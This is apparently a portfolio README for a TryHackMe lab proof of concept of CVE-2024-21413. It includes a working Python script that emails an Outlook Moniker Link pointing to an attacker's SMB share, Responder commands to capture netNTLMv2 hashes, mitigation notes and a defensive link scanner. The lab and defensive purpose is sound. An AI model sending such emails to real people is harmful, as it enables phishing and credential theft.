CVE-2024-21413 PoC — Microsoft Outlook Remote Code Execution Vulnerability

Associated Vulnerability
Title: Microsoft Outlook Remote Code Execution Vulnerability (CVE-2024-21413)
Description: Microsoft Outlook Remote Code Execution Vulnerability
Readme
# Email exploit Moniker Link-CVE-2024-21413-Module — Documentation

**Overview:** A practical PoC demonstrating the use of a Moniker Link in an HTML email to trigger an SMB connection from Outlook, allowing capture of a victim's netNTLMv2 hash via Responder. This showcases practical skills in penetration testing, scripting, and network protocol analysis.

---

## Key Skills Demonstrated

* Python scripting for automated email delivery
* Understanding of SMB, NTLMv2, LLMNR, NBT-NS and MDNS protocols
* Responder configuration and monitoring for hash capture
* Troubleshooting Linux network/DNS configuration issues
* Crafting a controlled offensive security scenario in a lab environment

---

## PoC Workflow

1. **Set up SMB listener:** Start Responder on the attack machine to monitor SMB authentication attempts.
2. **Send crafted email:** Use a Python script to deliver an HTML email with a Moniker Link (`file://`) pointing to the attacker's SMB share.
3. **Hash capture:** When the victim clicks the link, Outlook attempts to fetch the file over SMB, and Responder captures the netNTLMv2 hash.

---

## Minimal Exploit Script

```python
# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender = 'attacker@monikerlink.thm'
receiver = 'victim@monikerlink.thm'
mailserver = '10.201.52.124'  # THM SMTP server
password = input('Enter attacker email password: ')

html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'

msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))

with smtplib.SMTP(mailserver, 25) as s:
    s.ehlo()
    s.login(sender, password)
    s.sendmail(sender, [receiver], msg.as_string())
    print('Email delivered')
```

*Tip:* Replace `ATTACKER_IP` and `mailserver` before running. In the TryHackMe lab, the password is `attacker`.

---

## Running Responder

```bash
responder -I ens5
```

*Replace `ens5` with your network interface name.*

---

## Troubleshooting `/etc/resolv.conf`

Responder sometimes fails when `/etc/resolv.conf` is a broken symlink. Replace it with a static file (run as root):

```bash
# Remove the broken symlink and write a plain resolver configuration
rm -f /etc/resolv.conf
printf 'nameserver 8.8.8.8\nnameserver 1.1.1.1\n' > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf
```

*Skills highlighted:* Linux troubleshooting, DNS configuration, and adapting tools to cloud/VM environments.

---

## Progress Screenshots

1. **Error / Resolv.conf Issue**:
   ![Error Resolv.conf](Email%20exploit/error%20resolv.conf.PNG)

2. **DNS Fix Applied**: 
   ![DNS Setup Fix](Email%20exploit/dns%20setup%20fix.PNG)

3. **Python Email Script**:
   ![Python Email Script](Email%20exploit/python%20email%20script.PNG)

4. **Exploit Delivery**:
   ![Exploit Delivery](Email%20exploit/exploit%20delivery.PNG)

5. **Victim Inbox**:
   ![Victim Email](Email%20exploit/victime%20email.PNG)

6. **Captured Victim Hash**: 
   ![Captured Victim Hash](Email%20exploit/Victime%20hash.PNG)

---

## Tools & Commands Used

* **Responder**: SMB/LLMNR/NBT-NS/MDNS listener
* **Python3**: PoC email script execution
* **smtplib / email.mime**: Python libraries for crafting and sending emails
* Linux shell commands for DNS troubleshooting

---

## Skills Learned / Portfolio Highlight

* Network attack simulation and exploitation workflow
* Automation of social engineering vector (Moniker Link email)
* Capturing and analyzing netNTLMv2 hashes
* Cross-discipline troubleshooting: Python, networking, Windows & Linux interaction
* Documentation and workflow presentation for technical reviewers

---

## Mitigation & Defensive Notes

* Disable automatic external content in Outlook
* Block outbound SMB to untrusted networks
* Enforce SMB signing and modern authentication policies on Windows clients
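
A defender-side check for the link pattern this PoC relies on, added here as an example (it is not part of the original README or CMNatic's PoC): it scans a message's HTML parts for `file:` links to a remote host and flags those carrying the `!` Moniker suffix. The function names, verdict labels and sample message are constructed for illustration; handling of the backslash UNC spelling goes beyond what the README shows and is an assumption.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample message (hosts and addresses from documentation ranges).
SAMPLE = (
    b"From: a@example.test\r\nTo: b@example.test\r\n"
    b"Subject: constructed sample\r\nMIME-Version: 1.0\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n\r\n"
    b'<p><a href="https://example.test/ok">ok</a>'
    b'<a href="file://203.0.113.10/test!exploit">Click me</a>'
    b'<a href="file:///\\\\203.0.113.10\\share\\doc.rtf">doc</a></p>\r\n'
)

class LinkCollector(HTMLParser):
    """Collect href/src values from every tag in an HTML body."""
    def __init__(self):
        super().__init__()
        self.links = []
    def handle_starttag(self, tag, attrs):
        self.links += [v.strip() for k, v in attrs if k in ("href", "src") and v]

def classify_link(link):
    """Return 'moniker', 'remote-file' or None (hypothetical verdict labels)."""
    raw = unquote(link).strip()
    if not (raw.lower().startswith("file:") or raw.startswith("\\\\")):
        return None
    rest = raw[5:] if raw[:5].lower() == "file:" else raw
    rest = rest.replace("\\", "/").lstrip("/")
    first = rest.split("/", 1)[0]
    if not first or (len(first) == 2 and first[0].isalpha() and first[1] in ":|"):
        return None                        # empty target or local drive path
    return "moniker" if "!" in rest else "remote-file"

def scan_message(raw_bytes):
    """Return [(verdict, link)] for every flagged link in the HTML parts."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            collector = LinkCollector()
            collector.feed(part.get_content())
            findings += [(classify_link(u), u) for u in collector.links if classify_link(u)]
    return findings

if __name__ == "__main__":
    for verdict, link in scan_message(SAMPLE):
        print(f"{verdict:12} {link}")
```

A mail gateway or triage script could quarantine `moniker` hits outright and queue `remote-file` hits for review, since legitimate internal mail sometimes links to file shares.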

---

## Attribution

Adapted from TryHackMe MonikerLink lab and original PoC by CMNatic ([GitHub](https://github.com/cmnatic))

File Snapshot

```
[4.0K] /data/pocs/48af2c933a2f1be79e5a7a6e0c87a7195e1c7a72
├── [4.0K] Email exploit
│   ├── [190K] dns setup fix.PNG
│   ├── [284K] error resolv.conf.PNG
│   ├── [134K] exploit delivery.PNG
│   ├── [298K] python email script.PNG
│   ├── [227K] victime email.PNG
│   └── [415K] Victime hash.PNG
└── [3.9K] README.md

1 directory, 7 files
```